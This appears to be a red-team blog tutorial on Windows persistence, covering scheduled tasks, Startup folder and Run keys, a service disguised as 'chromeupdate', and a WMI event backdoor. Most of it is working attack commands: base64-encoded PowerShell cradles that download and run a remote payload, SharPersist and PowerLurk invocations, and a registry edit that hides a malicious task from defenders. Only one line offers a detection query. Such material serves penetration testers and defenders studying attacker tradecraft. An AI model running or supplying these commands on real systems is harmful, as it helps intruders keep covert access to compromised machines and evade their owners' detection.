Persistence ways(The adversary is trying to maintain their foothold)

6 min readJan 8, 2023

Gaining continued access to a computer system or network that has been compromised is known as persistence. It requires bypassing security measures and re-configuring systems so that access is maintained even after users log out or reboot the system. This type of access can be difficult to achieve, as the security measures that were designed to prevent initial access must be circumvented to maintain persistent access.

Persistence can be achieved by executing within userland, such as the current user, or by utilizing a higher privilege such as SYSTEM.

Let’s see some techniques-

Scheduled Tasks (T1053.005)-

Video demo:

a. Create a Powershell Scripted Web Delivery URL-
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''))"

b. Then we can base64 encode this-

$s = 'IEX ((new-object net.webclient).downloadstring("<Scripted Web Delivery url>"))'

#Ecoded output

c. Using SharpPersist for creating a scheduled task-

SharPersist.exe -t schtask -c <payload exe> -a <arguments> -n <Name of task> -m add -o hourly

SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMwA1AC4AMQAzADAAOgA4ADAALwBhACcAKQApAA==" -n "Updater" -m add -o hourly

d. We can check in the task scheduler our task has been configured-

execute-assembly /root/Desktop/Tools/SharPersist.exe -t schtask -m list -n Updater


i. We can export the task as XML as well-

 Export-ScheduledTask -TaskName "Updater"
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="">
<Principal id="Author">
<Actions Context="Author">

ii. And Registering task using this XML-

Register-ScheduledTask -xml (Get-Content 'path to xml' | Out-String) -TaskName <Task Name> -TaskPath "\TASK-PATH-TASKSCHEDULER\" -User COMPUTER-NAME\USER-NAME –Force

iii. OPSEC consideration-

Deleting the SD key hides the task from the task scheduler (requires SYSTEM permissions)-

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree

#Task info
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Task

We can use Psexec for spawning a shell as SYSTEM.

PsExec64.exe -accepteula -i -s powershell

Now let’s try to delete SD key for the Updater task-

Get-Item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Updater"
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Updater" -Name "SD"

Now our malicious scheduled task is not visible!!!

Defenders can try to find hidden tasks by querying Registry like this-

Get-ChildItem "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks" | findstr <task name>
#make token with admin on target
shell copy C:\temp\pivot-443.exe \\\C$\windows\temp\pivot-443.exe
shell dir \\\C$\\windows\temp\
shell schtasks /s /create /tn "golu" /tr C:\windows\temp\ptrace.exe /sc onstart /ru system
shell schtasks /s /run /tn "golu"

Note: We don’t create service binaries for scheduled tasks!!

Startup folder/Run or Run once registry keys(T1547.001)-

Video demo-

The Startup folder in Windows is a location where users can place shortcuts to programs that they want to run automatically when the computer starts up or when the user logs in. The Startup folder is usually located in the user’s profile folder, and can be accessed by navigating to the following path: “C:\Users\[username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” or run this using run “shell:startup” . Adversaries can use this folder for persistence. Let’s see this in action:

a. Generating encoded payload command-

#powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''))"

$s = 'IEX ((new-object net.webclient).downloadstring("<Scripted Web Delivery url>"))'


b. Adding a malicious shortcut to the startup folder using Sharpersist-

# Creating a shortcut in startup folder
execute-assembly /root/Desktop/Tools/SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMwA1AC4AMQAzADAAOgA4ADAALwBhACcAKQApAA==" -f "Defender_update" -m add

# Creating a reg key at HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run or HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
execute-assembly /root/Desktop/Tools/SharPersist.exe -t reg -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMwA1AC4AMQAzADAAOgA4ADAALwBhACcAKQApAA==" -v critical -k hkcurun -m add
C:\Users\ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

c. We can see that shortcut is created with an icon of internet explorer and upon checking properties we can see target field contains our payload.

Similarly, if we check our modified reg-

Get-Item  "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

d. Now each time this user login, our payload will be executed.

Privileged Access-



Administrator privileges (Our reverse shell/beacon must be running as admin)

Video demo:

  1. Let’s create an HTTP beacon again. (Follow the above steps)

We can see in the graph view as well that our compromised machine image is having electric symbols meaning this is a privileged beacon/shell.

# Verifying current proccess is not running as admin
powershell (New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

2. We need to create and upload the payload binary to the target. Again we can use either an egress beacon(reverse shell) or peer to peer beacon (bind shell)

I am using an HTTP egress beacon payload of type SVC.

execute-assembly /root/Desktop/Tools/SharPersist.exe -t service -c "C:\Users\user1\http_80_beacon_SVC.exe" -n "chromeupdate" -m add

# For removing
execute-assembly /root/Desktop/Tools/SharPersist.exe -t service -n chromeupdate -m remove

We can see our service has startup type “Automatic” which means The service will start at system logon.

3. Let’s restart the system and see if we get a beacon…

and we got shell as SYSTEM!!

This does not even require the user to log in!!

Bonus: Location of Services-


Wmi Events-


Administrator privileges (Our reverse shell/beacon must be running as admin). Only then we can configure wmi events.

  1. Import Powerlurk module-
powershell-import /root/Desktop/Tools/PowerLurk.ps1
#Using base64 ecoded payload- IEX ((new-object net.webclient).downloadstring('')) 
powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMwA1AC4AMQAzADAAOgA4ADAALwBhACcAKQApAA==" -Trigger ProcessStart -ProcessName explorer.exe

#Removing wmi event
powershell Get-WmiEvent -Name WmiBackdoor| Remove-WmiObject